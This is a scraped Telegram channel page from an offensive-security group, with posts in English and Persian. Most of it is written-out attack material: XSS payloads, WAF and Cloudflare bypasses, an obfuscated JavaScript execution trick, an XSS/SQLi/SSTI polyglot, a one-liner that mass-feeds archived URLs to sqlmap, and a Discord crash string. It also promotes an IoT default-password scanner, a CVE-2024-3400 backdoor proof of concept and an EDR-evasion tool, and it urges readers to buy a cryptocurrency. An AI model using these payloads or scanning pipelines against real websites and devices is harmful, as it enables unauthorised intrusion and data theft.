Telegram Web Link
CVE-2024-26630

Linux 6.5 Kernel Pointer Leak ❗️

Link

#Cve #linux #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
15k beshim ye chi bad sammi darim guys 🤫🔥
When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
0Day.Today | Learn Exploit | Zero World | Dark web |
15k beshim ye chi bad sammi darim guys 🤫🔥 When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
نتیجه ی تستش حالا یه چند تا تستی وبسایت ادد زدم .
The result of the test. Now I have done a few tests on the website
this string crashes discord 🤕

http://./\<#0>:  ://./<#0>

#trick #discord
——————‌
0Day.Today
@LearnExploit
@Tech_Army
XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
💣 Genzai 💣

💬
Genzai helps you identify IoT or Internet of Things related dashboards across a single or set of targets provided as an input and furthermore scan them for default password issues and potential vulnerabilities based on paths and versions.

📊 Features:
⚪️ Wireless Router
⚪️ Surveillance Camera
⚪️ HMI or Human Machine Interface
⚪️ Smart Power Control
⚪️ Building Access Control System
⚪️ Climate Control
⚪️ Industrial Automation
⚪️ Home Automation
⚪️ Water Treatment System

😸 Github

⬇️ Download
🔒 LearnExploit

#GO #iot #Security #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
قیمت Ton هم شده 7 دلار 🔥

قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار
😵💎

پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️

——————‌
0Day.Today
@LearnExploit
@Tech_Army
پاول دورف اعلام کرده که تعداد کاربران فعال تلگرام از مرز ۹۰۰ میلیون کاربر در ماه عبور کرده و این اپ ۶‌امین اپ پراستفاده و پردانلود در جهان هست.

درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥

Github

#poc #backdoor #0day
——————‌
0Day.Today
@LearnExploit
@Tech_Army
XSS Tip 🥵

If alert() is being converted to ALERT() and you can use
Like onerror="

𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"

#XSS #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
CrimsonEDR

💬
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.

🔼 Installation:
⚪️ Install dependancy:
sudo apt-get install gcc-mingw-w64-x86-64
⚪️ Download repository
⚪️ Compile the project:
cd CrimsonEDR;
chmod +x compile.sh;
./compile.sh

⚠️ Warning:
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

💻 Example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

😸 Github

⬇️ Download
🔒 LearnExploit

#C #Simulate #Malware #Dev

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Payload for XSS + SQLi + SSTI/CSTI !

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

#XSS #SQLI

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#Sqlmap #BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
2024/05/21 11:30:00
Back to Top
HTML Embed Code: